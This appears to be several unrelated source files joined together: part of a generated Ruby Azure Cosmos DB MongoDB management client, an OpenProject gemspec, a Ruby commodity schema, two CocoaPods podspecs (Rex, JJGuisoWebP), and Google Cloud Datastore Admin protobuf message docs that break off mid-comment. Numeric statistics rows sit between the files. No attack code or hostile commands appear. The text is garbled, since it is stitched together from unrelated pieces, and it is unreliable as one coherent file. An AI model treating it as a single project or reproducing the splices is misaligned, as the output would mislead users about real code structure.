# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
# Validate client configuration and every parameter against the constraints
# declared by the REST API spec; violations raise ArgumentError immediately.
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if !@client.subscription_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if !@client.api_version.nil? && @client.api_version.length < 1
fail ArgumentError, 'create_update_mongo_dbcollection_parameters is nil' if create_update_mongo_dbcollection_parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
# x-ms-client-request-id lets the service correlate this call in diagnostics.
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionCreateUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, create_update_mongo_dbcollection_parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
# Issue the asynchronous PUT; the returned promise resolves to an
# AzureOperationResponse once the HTTP round-trip completes.
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# 202 = create/update accepted (long-running); 200 = completed inline.
unless status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
# Only a 200 carries a MongoDBCollectionGetResults payload; 202 has no body.
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes an existing Azure Cosmos DB MongoDB Collection.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_delete_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
  # Blocks on the async delete. The service returns no payload for a delete
  # (202 accepted / 204 no content), so the method deliberately returns nil.
  # The previously-assigned local was unused and has been removed.
  begin_delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
  nil
end
#
# Deletes an existing Azure Cosmos DB MongoDB Collection.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_delete_mongo_dbcollection_with_http_info(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
  # Same delete call, but surfaces the full AzureOperationResponse so the
  # caller can inspect status and headers.
  promise = begin_delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers)
  promise.value!
end
#
# Deletes an existing Azure Cosmos DB MongoDB Collection.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
# Validate client configuration and every parameter against the constraints
# declared by the REST API spec; violations raise ArgumentError immediately.
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if !@client.subscription_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if !@client.api_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
# x-ms-client-request-id lets the service correlate this call in diagnostics.
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
# Issue the asynchronous DELETE; no request body is sent.
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# 202 = delete accepted (long-running); 204 = no content. Deletes never
# carry a response body, so there is no deserialization step.
unless status_code == 202 || status_code == 204
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Update the RUs per second of an Azure Cosmos DB MongoDB collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def begin_update_mongo_dbcollection_throughput(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
  # Synchronous wrapper: blocks on the async PUT and unwraps the deserialized
  # ThroughputSettingsGetResults body (nil when there is no response).
  result = begin_update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:custom_headers).value!
  result.body if result
end
#
# Update the RUs per second of an Azure Cosmos DB MongoDB collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_update_mongo_dbcollection_throughput_with_http_info(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
  # Same call as the plain variant, but surfaces the full
  # AzureOperationResponse (status, headers) rather than only the body.
  promise = begin_update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:custom_headers)
  promise.value!
end
#
# Update the RUs per second of an Azure Cosmos DB MongoDB collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
# Validate client configuration and every parameter against the constraints
# declared by the REST API spec; violations raise ArgumentError immediately.
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if !@client.subscription_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if !@client.api_version.nil? && @client.api_version.length < 1
fail ArgumentError, 'update_throughput_parameters is nil' if update_throughput_parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
# x-ms-client-request-id lets the service correlate this call in diagnostics.
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, update_throughput_parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}/throughputSettings/default'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
# Issue the asynchronous PUT; the returned promise resolves to an
# AzureOperationResponse once the HTTP round-trip completes.
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# 202 = update accepted (long-running); 200 = completed inline.
unless status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
# Only a 200 carries a ThroughputSettingsGetResults payload; 202 has no body.
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
end
end
| 57.543058 | 239 | 0.724452 |
ff00db3e35a01164d3621ff2961d289bf2480e8a | 590 | # encoding: UTF-8
Gem::Specification.new do |s|
s.name = 'openproject-openid_connect'
s.version = '1.0.0'
s.authors = 'OpenProject GmbH'
s.email = '[email protected]'
s.summary = 'OpenProject OpenID Connect'
s.description = 'Adds OmniAuth OpenID Connect strategy providers to Openproject.'
s.license = 'GPLv3'
s.files = Dir['{app,config,db,lib}/**/*'] + %w(CHANGELOG.md README.md)
s.add_dependency 'openproject-auth_plugins'
s.add_dependency 'omniauth-openid_connect-providers', '~> 0.1'
s.add_dependency 'lobby_boy', '~> 0.1.3'
end
| 32.777778 | 83 | 0.666102 |
62d173014e566634789d48834ef270319bee256f | 491 | # frozen_string_literal: true
module MasterfilesApp
CommoditySchema = Dry::Schema.Params do
optional(:id).filled(:integer)
required(:commodity_group_id).filled(:integer)
required(:code).filled(Types::StrippedString)
required(:description).filled(Types::StrippedString)
required(:hs_code).filled(Types::StrippedString)
required(:requires_standard_counts).maybe(:bool)
required(:use_size_ref_for_edi).maybe(:bool)
# required(:active).filled(:bool)
end
end
| 32.733333 | 56 | 0.749491 |
917d3e6e9a9e3c3de7b682ac9b0fc38a91e98227 | 1,132 | Pod::Spec.new do |s|
s.name = 'Rex'
s.module_name = 'Rex'
s.version = '0.10.0'
s.summary = 'ReactiveCocoa Extensions'
s.description = <<-DESC
Extensions for ReactiveCocoa that may not fit in the core framework.
DESC
s.homepage = 'https://github.com/neilpa/Rex'
s.license = 'MIT'
s.author = { 'Neil Pankey' => '[email protected]' }
s.ios.deployment_target = '8.0'
s.osx.deployment_target = '10.10'
s.watchos.deployment_target = '2.0'
s.tvos.deployment_target = '9.0'
s.source = { :git => 'https://github.com/neilpa/Rex.git', :tag => s.version }
s.dependency 'ReactiveCocoa', '~> 4.1'
s.ios.framework = 'UIKit'
s.tvos.framework = 'UIKit'
s.osx.framework = 'AppKit'
s.source_files = 'Source/**/*.swift'
s.ios.exclude_files = 'Source/AppKit/*'
s.tvos.exclude_files = 'Source/AppKit/*', 'Source/UIKit/UIDatePicker.swift', 'Source/UIKit/UISwitch.swift', 'Source/UIKit/UISegmentedControl.swift'
s.watchos.exclude_files = 'Source/AppKit/*', 'Source/UIKit/*'
s.osx.exclude_files = 'Source/UIKit/*'
end
| 33.294118 | 149 | 0.621025 |
7ac71dd97e98800592c90c7c26c9c66fa1d9c3a5 | 2,014 | #
# Be sure to run `pod lib lint JJGuisoWebP.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'JJGuisoWebP'
s.version = '1.1'
s.summary = 'Decode Animated Image '
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/only-icesoul/JJGuisoWebP'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'only-icesoul' => '[email protected]' }
s.source = { :git => 'https://github.com/only-icesoul/JJGuisoWebP.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '9.0'
s.source_files = ['src/**/*.{swift,h}']
s.swift_version = '5.0'
s.vendored_frameworks = 'src/Frameworks/*.framework'
s.ios.preserve_paths = 'src/Frameworks'
s.public_header_files = 'src/Frameworks/**/Headers/*.{h}'
# comment arm64 for xcode 11 if any error
s.pod_target_xcconfig = { 'ARCHS' => '$(ARCHS_STANDARD)' ,
'ONLY_ACTIVE_ARCH' => 'YES'}
s.user_target_xcconfig = { 'ARCHS' => '$(ARCHS_STANDARD)', 'ONLY_ACTIVE_ARCH' => 'YES'}
# s.resource_bundles = {
# 'JJGuisoWebP' => ['JJGuisoWebP/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 35.333333 | 108 | 0.642006 |
873ef3117381a0ae86d484d1324f670434d0de8c | 19,826 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Cloud
module Datastore
module Admin
module V1
# Metadata common to all Datastore Admin operations.
# @!attribute [rw] start_time
# @return [::Google::Protobuf::Timestamp]
# The time that work began on the operation.
# @!attribute [rw] end_time
# @return [::Google::Protobuf::Timestamp]
# The time the operation ended, either successfully or otherwise.
# @!attribute [rw] operation_type
# @return [::Google::Cloud::Datastore::Admin::V1::OperationType]
# The type of the operation. Can be used as a filter in
# ListOperationsRequest.
# @!attribute [rw] labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# The client-assigned labels which were provided when the operation was
# created. May also include additional labels.
# @!attribute [rw] state
# @return [::Google::Cloud::Datastore::Admin::V1::CommonMetadata::State]
# The current state of the Operation.
class CommonMetadata
# Generated protobuf message stub (gapic-generator-ruby); field accessors
# are documented in the @!attribute YARD tags above.
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
# Generated map-entry message backing the `labels` field
# (Map{String => String}).
class LabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The various possible states for an ongoing Operation.
module State
# Unspecified.
STATE_UNSPECIFIED = 0
# Request is being prepared for processing.
INITIALIZING = 1
# Request is actively being processed.
PROCESSING = 2
# Request is in the process of being cancelled after user called
# google.longrunning.Operations.CancelOperation on the operation.
CANCELLING = 3
# Request has been processed and is in its finalization stage.
FINALIZING = 4
# Request has completed successfully.
SUCCESSFUL = 5
# Request has finished being processed, but encountered an error.
FAILED = 6
# Request has finished being cancelled after user called
# google.longrunning.Operations.CancelOperation.
CANCELLED = 7
end
end
# Measures the progress of a particular metric.
# @!attribute [rw] work_completed
# @return [::Integer]
# The amount of work that has been completed. Note that this may be greater
# than work_estimated.
# @!attribute [rw] work_estimated
# @return [::Integer]
# An estimate of how much work needs to be performed. May be zero if the
# work estimate is unavailable.
class Progress
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#export_entities google.datastore.admin.v1.DatastoreAdmin.ExportEntities}.
# @!attribute [rw] project_id
# @return [::String]
# Required. Project ID against which to make the request.
# @!attribute [rw] labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# Client-assigned labels.
# @!attribute [rw] entity_filter
# @return [::Google::Cloud::Datastore::Admin::V1::EntityFilter]
# Description of what data from the project is included in the export.
# @!attribute [rw] output_url_prefix
# @return [::String]
# Required. Location for the export metadata and data files.
#
# The full resource URL of the external storage location. Currently, only
# Google Cloud Storage is supported. So output_url_prefix should be of the
# form: `gs://BUCKET_NAME[/NAMESPACE_PATH]`, where `BUCKET_NAME` is the
# name of the Cloud Storage bucket and `NAMESPACE_PATH` is an optional Cloud
# Storage namespace path (this is not a Cloud Datastore namespace). For more
# information about Cloud Storage namespace paths, see
# [Object name
# considerations](https://cloud.google.com/storage/docs/naming#object-considerations).
#
# The resulting files will be nested deeper than the specified URL prefix.
# The final output URL will be provided in the
# {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesResponse#output_url google.datastore.admin.v1.ExportEntitiesResponse.output_url} field. That
# value should be used for subsequent ImportEntities operations.
#
# By nesting the data files deeper, the same Cloud Storage bucket can be used
# in multiple ExportEntities operations without conflict.
class ExportEntitiesRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class LabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#import_entities google.datastore.admin.v1.DatastoreAdmin.ImportEntities}.
# @!attribute [rw] project_id
# @return [::String]
# Required. Project ID against which to make the request.
# @!attribute [rw] labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# Client-assigned labels.
# @!attribute [rw] input_url
# @return [::String]
# Required. The full resource URL of the external storage location. Currently, only
# Google Cloud Storage is supported. So input_url should be of the form:
# `gs://BUCKET_NAME[/NAMESPACE_PATH]/OVERALL_EXPORT_METADATA_FILE`, where
# `BUCKET_NAME` is the name of the Cloud Storage bucket, `NAMESPACE_PATH` is
# an optional Cloud Storage namespace path (this is not a Cloud Datastore
# namespace), and `OVERALL_EXPORT_METADATA_FILE` is the metadata file written
# by the ExportEntities operation. For more information about Cloud Storage
# namespace paths, see
# [Object name
# considerations](https://cloud.google.com/storage/docs/naming#object-considerations).
#
# For more information, see
# {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesResponse#output_url google.datastore.admin.v1.ExportEntitiesResponse.output_url}.
# @!attribute [rw] entity_filter
# @return [::Google::Cloud::Datastore::Admin::V1::EntityFilter]
# Optionally specify which kinds/namespaces are to be imported. If provided,
# the list must be a subset of the EntityFilter used in creating the export,
# otherwise a FAILED_PRECONDITION error will be returned. If no filter is
# specified then all entities from the export are imported.
class ImportEntitiesRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class LabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# The response for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#export_entities google.datastore.admin.v1.DatastoreAdmin.ExportEntities}.
# @!attribute [rw] output_url
# @return [::String]
# Location of the output metadata file. This can be used to begin an import
# into Cloud Datastore (this project or another project). See
# {::Google::Cloud::Datastore::Admin::V1::ImportEntitiesRequest#input_url google.datastore.admin.v1.ImportEntitiesRequest.input_url}.
# Only present if the operation completed successfully.
class ExportEntitiesResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Metadata for ExportEntities operations.
# @!attribute [rw] common
# @return [::Google::Cloud::Datastore::Admin::V1::CommonMetadata]
# Metadata common to all Datastore Admin operations.
# @!attribute [rw] progress_entities
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of entities processed.
# @!attribute [rw] progress_bytes
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of bytes processed.
# @!attribute [rw] entity_filter
# @return [::Google::Cloud::Datastore::Admin::V1::EntityFilter]
# Description of which entities are being exported.
# @!attribute [rw] output_url_prefix
# @return [::String]
# Location for the export metadata and data files. This will be the same
# value as the
# {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesRequest#output_url_prefix google.datastore.admin.v1.ExportEntitiesRequest.output_url_prefix}
# field. The final output location is provided in
# {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesResponse#output_url google.datastore.admin.v1.ExportEntitiesResponse.output_url}.
class ExportEntitiesMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Metadata for ImportEntities operations.
# @!attribute [rw] common
# @return [::Google::Cloud::Datastore::Admin::V1::CommonMetadata]
# Metadata common to all Datastore Admin operations.
# @!attribute [rw] progress_entities
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of entities processed.
# @!attribute [rw] progress_bytes
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of bytes processed.
# @!attribute [rw] entity_filter
# @return [::Google::Cloud::Datastore::Admin::V1::EntityFilter]
# Description of which entities are being imported.
# @!attribute [rw] input_url
# @return [::String]
# The location of the import metadata file. This will be the same value as
# the {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesResponse#output_url google.datastore.admin.v1.ExportEntitiesResponse.output_url} field.
class ImportEntitiesMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Identifies a subset of entities in a project. This is specified as
# combinations of kinds and namespaces (either or both of which may be all, as
# described in the following examples).
# Example usage:
#
# Entire project:
# kinds=[], namespace_ids=[]
#
# Kinds Foo and Bar in all namespaces:
# kinds=['Foo', 'Bar'], namespace_ids=[]
#
# Kinds Foo and Bar only in the default namespace:
# kinds=['Foo', 'Bar'], namespace_ids=['']
#
# Kinds Foo and Bar in both the default and Baz namespaces:
# kinds=['Foo', 'Bar'], namespace_ids=['', 'Baz']
#
# The entire Baz namespace:
# kinds=[], namespace_ids=['Baz']
# @!attribute [rw] kinds
# @return [::Array<::String>]
# If empty, then this represents all kinds.
# @!attribute [rw] namespace_ids
# @return [::Array<::String>]
# An empty list represents all namespaces. This is the preferred
# usage for projects that don't use namespaces.
#
# An empty string element represents the default namespace. This should be
# used if the project has data in non-default namespaces, but doesn't want to
# include them.
# Each namespace in this list must be unique.
class EntityFilter
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#create_index google.datastore.admin.v1.DatastoreAdmin.CreateIndex}.
# @!attribute [rw] project_id
# @return [::String]
# Project ID against which to make the request.
# @!attribute [rw] index
